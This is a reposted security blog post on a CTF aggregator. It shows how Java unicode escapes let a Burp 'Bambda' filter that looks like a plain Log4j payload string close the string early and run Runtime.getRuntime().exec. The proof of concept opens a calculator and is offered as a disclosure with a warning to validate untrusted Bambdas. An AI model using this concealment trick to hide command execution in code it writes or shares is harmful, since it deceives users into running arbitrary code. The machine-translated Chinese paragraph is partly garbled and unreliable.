Hiding payloads in Java source code strings

Hiding payloads in Java source code strings

In this post we’ll show you how Java handles unicode escapes in source code strings in a way you might find surprising – and how you can abuse them to conceal payloads.

We recently released a powerful new feature called Bambdas . They allow you to filter items in Burp using Java code. But that got us wondering, what if you could convince a user to run a Bambda that looked like an honest exploit payload but actually executed arbitrary code on the local machine?

What do you expect would happen when you use the following in a Bambda:

var log4jpayload = "%24%7Bndi:ldap://psres.net/\u0022;Runtime.getRuntime().exec(\u0022open -a calculator\u0022);//%7D";
return requestResponse.request().contains(log4jpayload, false)

If you were expecting a simple string assignment you’d be wrong. What actually happens is the Java compiler treats the unicode encoded double quote (\u0022) as a double quote and closes the string. Then Runtime.getRuntime() is executed along with the command passed with an encoded string. Java pretty much allows you to encode the entire syntax with unicode escapes!
如果你期待一个简单的字符串赋值,你就错了。实际上,Java编译器将unicode编码的双引号(\u0022)视为双引号并关闭字符串。然后沿着传递带有编码字符串的命令一起执行. getString()。Java几乎允许你用unicode转义来编码整个语法!

We couldn’t find this technique publicly documented anywhere, but if you liked this you can find a bunch of related attacks in this paper .

Remember a Bambda allows arbitrary code execution so when using one from an untrusted source make sure you validate it before using it!

原文始发于Gareth Heyes:Hiding payloads in Java source code strings

版权声明:admin 发表于 2024年1月24日 上午10:31。
转载请注明:Hiding payloads in Java source code strings | CTF导航